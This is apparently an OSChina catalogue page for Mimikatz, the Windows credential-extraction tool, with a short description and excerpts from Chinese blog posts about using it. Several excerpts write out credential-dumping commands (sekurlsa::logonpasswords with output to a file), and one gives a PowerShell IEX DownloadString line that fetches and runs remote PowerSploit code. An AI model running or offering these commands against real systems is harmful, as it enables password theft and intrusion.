Mimikatz 正在参加 2021 年度 OSC 中国开源项目评选,请投票支持!
Mimikatz 在 2021 年度 OSC 中国开源项目评选 中已获得 {{ projectVoteCount }} 票,请投票支持!
2021 年度 OSC 中国开源项目评选 正在火热进行中,快来投票支持你喜欢的开源项目!
2021 年度 OSC 中国开源项目评选 >>> 中场回顾
Mimikatz 获得 2021 年度 OSC 中国开源项目评选「最佳人气项目」 !
授权协议 CC BY 4.0
开发语言 C/C++ 查看源码 »
操作系统 Windows
软件类型 开源软件
开源组织
地区 不详
投 递 者 红薯
适用人群 未知
收录时间 2016-03-24

软件简介

Mimikatz 是一个工具,用来学习 C 语言和做一些关于 Windows 安全的实验。

它可以从内存中提取明文密码、哈希值、PIN码和Kerberos票据。Mimikatz还可以执行传递哈希值、传递票据或建立金票。

这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器

可以提升进程权限 注入进程 读取进程内存等等

下面展示一个 读取扫雷游戏的内存的例子

轻量级调试器神器 - mimikatz

我们还可以通过pause命令来挂起该进程 这个时候游戏的时间就静止了

轻量级调试器神器 - mimikatz

展开阅读全文

代码

的 Gitee 指数为
超过 的项目

评论 (0)

加载中
更多评论
2021/08/16 08:21

开源工具以纯文本形式从 Windows 365 中提取 Azure 凭证

微软的 Windows 365 自推出以来只过了几周的时间,但如今已经有研究人员发现了安全漏洞,并可以利用该漏洞提取用户未加密的明文 Microsoft Azure 凭证。 微软的 Windows 365 自推出以来只过了几周的时间,但如今已经有研究人员发现了安全漏洞,并可以利用该漏洞提取用户未加密的明文 Microsoft Azure 凭证。 安全研究人员 Benjamin Delpy 使用了一个名为 Mimikatz 的工具提取 Azure 凭证,Mimikatz 是一个开源的网络安全项目,由...

0
3
没有更多内容
加载失败,请刷新页面
点击加载更多
加载中
下一页
发表了博客
2020/08/21 00:02

Mimikatz的简单使用

mimikatz mimikatz是法国人Gentil Kiwi 编写的一款 Windows 平台下的神器,它具备很多功能,其中最主要的功能是直接从 lsass.exe 进程里获取处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://blog.gentilkiwi.com/ mimikatz的使用 查看mimikatz的版本 查看mimikatz中的模块 随便输入 xx:: ,...

0
0
发表了博客
2019/10/02 16:44

mimikatz使用笔记

一、获取密码# privilege::debug sekurlsa::logonpasswords mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswords full" >>1.txt exit   一般我会使用bat @echo off mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>C:\programdata\1.txt 二、powershell获取密码# powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master...

0
0
2020/04/20 22:03

神器:Mimikatz 2.20 (最新版)

这段时间,忙且累...... 今天值班,特抽出时间将这个利器编译完成奉献给大家。 因为时间有限,很多内容就没展开写,等有时间了再写个长点的。 一、编译Mimikatz Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,功能强大,能够直接读取Windows操作系统的明文密码;现在最新版本是2.2.0。 Mimikatz最新版一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为x86 32位(多了一个mimilove.exe)和X64位。 源码...

0
1
发表了博客
2020/08/24 07:17

[后渗透]Mimikatz使用大全

0x00 简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz...

0
0
发表了博客
2019/01/02 22:23

Mimikatz命令简单使用

简介 Mimikatz是法国人Gentil Kiwi写的一款windows平台下的轻量级调试器,于2014年4月发起。它的功能非常强大,支持从windows进程lsass.exe 里猎取windows处于active状态账号明文密码、哈希、PIN码和Kerberos凭证,以及pass-the-hash、pass-the-ticket、build Golden tickets等数种黑客技术,还可以本地提权等操作,在内网中杀伤力很大。 命令: cls-----------------------------清屏 exit----------------------------退出 ve...

0
0
发表了博客
2018/01/20 18:49

【源码阅读】VS调试mimikatz-改造法国神器mimikatz执行就获取明文密码

0x1 概要 记得某位同学提起在XXX得到了一个一键生成明文的工具,觉得很是神奇。。。 然而我一看图标就知道是mimikatz,这工具是开源的,只要改两行代码就可以实现写死命令了。 顺带讲讲编译过程中的问题和解决方法。 0x2 详情 调试这个工具的时候,发现新版本没生成debug模式的选项,F11调试没有对应到源代码。仔细一看原来是没有生成调试文件。 设置让Release的程序也生成pdb文件即可。 另外mimikatz没有debug版,所以导致有些...

0
0
发表了博客
2020/07/04 12:18

mimikatz-域密码获取神器

mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里猎取windows处于active状态账号明文密码,非常强大。 在网上找了一些相关的文章自己的一点总结吧 下载地址:https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170409 mimikatz_trunk为编译好的exe文件 mimikatz_master为源码文件 下面是在我机器上的运行结果:(版本2.1.1,64位OS) 这个软件被称为密码抓取神器,mimikatz2.0以后的版...

0
0
没有更多内容
加载失败,请刷新页面
点击加载更多
加载中
下一页
暂无内容
0 评论
13 收藏
分享
OSCHINA
登录后可查看更多优质内容
返回顶部
顶部